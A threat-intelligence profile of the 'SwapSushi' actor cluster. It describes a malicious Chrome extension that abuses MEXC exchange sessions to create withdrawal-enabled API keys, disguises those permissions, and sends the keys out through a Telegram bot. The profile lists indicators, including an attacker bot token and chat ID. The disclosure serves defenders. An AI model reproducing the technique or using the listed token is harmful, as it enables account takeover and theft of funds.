SwapSushi

SwapSushi is a crypto-focused threat actor/cluster (moderate-confidence linkage) associated with the “SwapSushi” brand across Telegram bots and other social/infrastructure. Socket’s Threat Research Team linked this cluster to a malicious Google Chrome extension, “MEXC API Automator,” published on the Chrome Web Store on 2025-09-01 by the handle “jorjortan142” (developer contact: jorjortan142@gmail[.]com; extension ID: pppdfgkfdemgfknfnhpkibbkabhghhfh). The extension targets users of the MEXC cryptocurrency exchange by abusing the victim’s authenticated browser session on mexc.com to programmatically create new API keys, enable broad permissions including withdrawals, and then deceive the user by manipulating the UI to display withdrawal permissions as disabled while keeping them enabled server-side. After key creation, it extracts the Access Key and Secret Key from the MEXC success modal and exfiltrates them via HTTPS POST to the Telegram Bot API (hardcoded bot token 7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I; chat ID 6526634583), giving the actor programmatic control to execute trades and initiate withdrawals to drain victim funds without needing passwords or bypassing 2FA (it waits for the user to complete 2FA normally). Code analysis noted numerous Russian-language inline comments; Socket assessed with moderate confidence that the developer/operator is Russian-speaking, without making country-level attribution. Reported related SwapSushi-linked infrastructure/social includes t[.]me/swapsushibot, swapsushi[.]net, and an X handle @jorjortan142 (display name “sushi.crypto”).